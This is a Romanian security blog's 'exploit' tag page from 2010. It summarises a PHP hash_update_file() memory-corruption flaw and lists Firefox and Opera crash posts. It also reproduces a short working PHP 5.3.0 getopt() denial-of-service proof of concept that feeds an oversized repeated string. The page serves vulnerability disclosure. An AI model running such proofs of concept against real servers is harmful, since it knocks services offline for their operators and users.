Posts Tagged exploit

Vulnerabilitate PHP în funcţia hash_update_file()

Posted by Mihai in Vulnerabilităţi on May 11, 2010

Versiuni afectate: PHP 5.2 <=5.2.13
Consecinţe: Acces nesancţionat la resurse, executarea codului maliţios.
Instrucţiuni oficiale de utilizare a funcţiei: http://php.net/manual/en/function.hash-update-file.php

Descriere:

La chemarea funcţiei hash_update_file (), în primul rând se încearcă accesarea resurselor de date pentru o prelucrare ulterioară. Apoi se citesc datele din fluxul de date(stream) în scopul de hashing. O modificare maliţioasă a handler-ului către stream, poate distruge resursa hash din handler-ul citit la moment şi poate condiţiona înlocuirea handler-ului cu un altul, care conţine o modificare a tabelului de pointeri cu hash-uri. La continuarea procesului de hashing de către funcţia internă se va apela pointer-ul rescris şi se va încerca executarea unui cod maliţios.

Exploatarea vulnerabilităţii

Următorul script va încerca să exploateze această vulnerabilitate şi să cauzeze o execuţie în adresa 0×55555555, care în mod normal ar trebui să eşueze. Read the rest of this entry »

, ,

No Comments

PHP 5.3.0 getopt() Denial of Service

Posted by Mihai in Exploits, Securitate Web on April 13, 2010 

<?php
#####################################################################
## PHP 5.3.0 getopt() Denial of service
## Tested on WIN XP FR SP3, WIN VISTA FR SP2, Apache, PHP 5.3.0
## Denial of service
## Author: Napst3r
## Greets To: My Laptop &  all My Friends
#####################################################################

$buffer  = str_repeat('A:', 9999);
$options = getopt($buffer);
 
?>

, ,

No Comments

Mozilla Firefox 3.6 plenitude String Crash(0day) Exploit

Posted by Mihai in Exploits, Vulnerabilităţi on March 9, 2010


Read the rest of this entry »

,

4 Comments

Opera 10.50 Asynchronous XMLHttpRequest Basic Auth Crash

Posted by Mihai in Exploits, Vulnerabilităţi on March 9, 2010

Read the rest of this entry »

,

No Comments